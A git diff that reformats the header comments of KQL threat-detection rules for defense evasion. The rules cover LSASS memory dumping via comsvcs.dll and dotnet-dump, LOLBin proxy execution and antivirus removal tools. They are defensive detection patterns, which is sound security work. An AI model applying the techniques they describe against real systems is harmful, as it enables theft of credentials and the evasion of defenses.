(Nextron Systems), Tim Shelton +// Date: 2019-01-16 +// Level: high +// Description: Detects a potentially suspicious execution from an uncommon folder. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\All Users\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\NetworkService\\" or FolderPath contains ":\\Windows\\addins\\" or FolderPath contains ":\\Windows\\debug\\" or FolderPath contains ":\\Windows\\Fonts\\" or FolderPath contains ":\\Windows\\Help\\" or FolderPath contains ":\\Windows\\IME\\" or FolderPath contains ":\\Windows\\Media\\" or FolderPath contains ":\\Windows\\repair\\" or FolderPath contains ":\\Windows\\security\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains "$Recycle.bin" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql index 6cbdad72..25656e9f 100644 --- a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql +++ b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql @@ -1,12 +1,12 @@ -// Title: Process Launched Without Image Name -// Author: Matt Anderson (Huntress) -// Date: 2024-07-23 -// Level: medium -// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Rare legitimate software. - -DeviceProcessEvents +// Title: Process Launched Without Image Name +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Rare legitimate software. + +DeviceProcessEvents | where FolderPath endswith "\\.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql index ff040eff..b9b7a90d 100644 --- a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql +++ b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql @@ -1,12 +1,12 @@ -// Title: Process Memory Dump Via Comsvcs.DLL -// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2020-02-18 -// Level: high -// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Process Memory Dump Via Comsvcs.DLL +// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2020-02-18 +// Level: high +// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "#65560") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains "\"#") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql index dcd20223..8e9c3f19 100644 --- a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql +++ b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql @@ -1,12 +1,12 @@ -// Title: Process Memory Dump Via Dotnet-Dump -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-14 -// Level: medium -// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated - -DeviceProcessEvents +// Title: Process Memory Dump Via Dotnet-Dump +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated + +DeviceProcessEvents | where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql index a7d5dc12..272776a6 100644 --- a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql +++ b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql @@ -1,12 +1,12 @@ -// Title: Process Proxy Execution Via Squirrel.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022-06-09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 -// False Positives: -// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) - -DeviceProcessEvents +// Title: Process Proxy Execution Via Squirrel.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2022-06-09 +// Level: medium +// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) + +DeviceProcessEvents | where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not((((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStart") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains "Discord.exe")) or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql index bc1d55df..4623d3d3 100644 --- a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql +++ b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql @@ -1,15 +1,15 @@ -// Title: Proxy Execution via Vshadow -// Author: David Faiss -// Date: 2025-05-26 -// Level: medium -// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits. -// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag, -// attackers can leverage this parameter to proxy the execution of malware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 -// False Positives: -// - System backup or administrator tools -// - Legitimate administrative scripts - -DeviceProcessEvents +// Title: Proxy Execution via Vshadow +// Author: David Faiss +// Date: 2025-05-26 +// Level: medium +// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits. +// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag, +// attackers can leverage this parameter to proxy the execution of malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - System backup or administrator tools +// - Legitimate administrative scripts + +DeviceProcessEvents | where ProcessCommandLine contains "-exec" and (FolderPath endswith "\\vshadow.exe" or ProcessVersionInfoOriginalFileName =~ "vshadow.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql index 14cef805..91353a20 100644 --- a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql +++ b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql @@ -1,10 +1,10 @@ -// Title: Proxy Execution Via Wuauclt.EXE -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team -// Date: 2020-10-12 -// Level: high -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.execution - -DeviceProcessEvents +// Title: Proxy Execution Via Wuauclt.EXE +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team +// Date: 2020-10-12 +// Level: high +// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution + +DeviceProcessEvents | where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql index 83d5c4da..57a5d22c 100644 --- a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql +++ b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql @@ -1,10 +1,10 @@ -// Title: PSScriptPolicyTest Creation By Uncommon Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-01 -// Level: medium -// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceFileEvents +// Title: PSScriptPolicyTest Creation By Uncommon Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents | where FolderPath contains "__PSScriptPolicyTest_" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\sdiagnhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql index 96c32fb2..f40389f8 100644 --- a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql +++ b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - AdvancedRun Suspicious Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-20 -// Level: high -// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 - -DeviceProcessEvents +// Title: PUA - AdvancedRun Suspicious Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-20 +// Level: high +// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql index bfa23331..30b17c8e 100644 --- a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql +++ b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - CleanWipe Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-18 -// Level: high -// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administrative use (Should be investigated either way) - -DeviceProcessEvents +// Title: PUA - CleanWipe Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: high +// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrative use (Should be investigated either way) + +DeviceProcessEvents | where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql index df5cb69e..2cccb8ec 100644 --- a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql +++ b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - DefenderCheck Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-30 -// Level: high -// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.005 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: PUA - DefenderCheck Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql index 185532c8..150e4d9e 100644 --- a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql +++ b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql @@ -1,12 +1,12 @@ -// Title: PUA - Potential PE Metadata Tamper Using Rcedit -// Author: Micah Babinski -// Date: 2022-12-11 -// Level: medium -// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027 -// False Positives: -// - Legitimate use of the tool by administrators or users to update metadata of a binary - -DeviceProcessEvents +// Title: PUA - Potential PE Metadata Tamper Using Rcedit +// Author: Micah Babinski +// Date: 2022-12-11 +// Level: medium +// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027 +// False Positives: +// - Legitimate use of the tool by administrators or users to update metadata of a binary + +DeviceProcessEvents | where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql index b6a46bbb..19b74866 100644 --- a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql +++ b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql @@ -1,14 +1,14 @@ -// Title: PUA - Process Hacker Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-10 -// Level: medium -// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). -// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. -// Threat actors abused older vulnerable versions to manipulate system processes. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543 -// False Positives: -// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis - -DeviceProcessEvents +// Title: PUA - Process Hacker Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-10 +// Level: medium +// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). +// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. +// Threat actors abused older vulnerable versions to manipulate system processes. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543 +// False Positives: +// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis + +DeviceProcessEvents | where FolderPath contains "\\ProcessHacker_" or FolderPath endswith "\\ProcessHacker.exe" or (ProcessVersionInfoOriginalFileName in~ ("ProcessHacker.exe", "Process Hacker")) or ProcessVersionInfoFileDescription =~ "Process Hacker" or ProcessVersionInfoProductName =~ "Process Hacker" or ((MD5 startswith "68F9B52895F4D34E74112F3129B3B00D" or MD5 startswith "B365AF317AE730A67C936F21432B9C71") or (SHA1 startswith "A0BDFAC3CE1880B32FF9B696458327CE352E3B1D" or SHA1 startswith "C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E") or (SHA256 startswith "D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F" or SHA256 startswith "BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql index c694610a..5812406c 100644 --- a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql @@ -1,12 +1,12 @@ -// Title: Publisher Attachment File Dropped In Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-08 -// Level: medium -// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate usage of ".pub" files from those locations - -DeviceFileEvents +// Title: Publisher Attachment File Dropped In Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of ".pub" files from those locations + +DeviceFileEvents | where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql index f5e7ba81..24b411db 100644 --- a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql +++ b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql @@ -1,10 +1,10 @@ -// Title: Pubprn.vbs Proxy Execution -// Author: frack113 -// Date: 2022-05-28 -// Level: medium -// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216.001 - -DeviceProcessEvents +// Title: Pubprn.vbs Proxy Execution +// Author: frack113 +// Date: 2022-05-28 +// Level: medium +// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216.001 + +DeviceProcessEvents | where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql index 3d3c5926..11d7136c 100644 --- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql +++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql @@ -1,11 +1,11 @@ -// Title: Python Function Execution Security Warning Disabled In Excel -// Author: @Kostastsale -// Date: 2023-08-22 -// Level: high -// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. -// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Python Function Execution Security Warning Disabled In Excel +// Author: @Kostastsale +// Date: 2023-08-22 +// Level: high +// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. +// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where ProcessCommandLine contains " 0" and (ProcessCommandLine contains "\\Microsoft\\Office\\" and ProcessCommandLine contains "\\Excel\\Security" and ProcessCommandLine contains "PythonFunctionWarnings") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql index c6146bf3..4ebc73f4 100644 --- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql +++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql @@ -1,11 +1,11 @@ -// Title: Python Function Execution Security Warning Disabled In Excel - Registry -// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale -// Date: 2024-08-23 -// Level: high -// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. -// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Python Function Execution Security Warning Disabled In Excel - Registry +// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale +// Date: 2024-08-23 +// Level: high +// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. +// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql index dda31efe..b927676d 100644 --- a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql +++ b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql @@ -1,16 +1,16 @@ -// Title: Python Image Load By Non-Python Process -// Author: Patrick St. John, OTR (Open Threat Research) -// Date: 2020-05-03 -// Level: low -// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. -// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables. -// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.002 -// False Positives: -// - Legitimate Py2Exe Binaries -// - Known false positive caused with Python Anaconda -// - Various legitimate software is bundled from Python code into executables - -DeviceImageLoadEvents +// Title: Python Image Load By Non-Python Process +// Author: Patrick St. John, OTR (Open Threat Research) +// Date: 2020-05-03 +// Level: low +// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. +// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables. +// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, 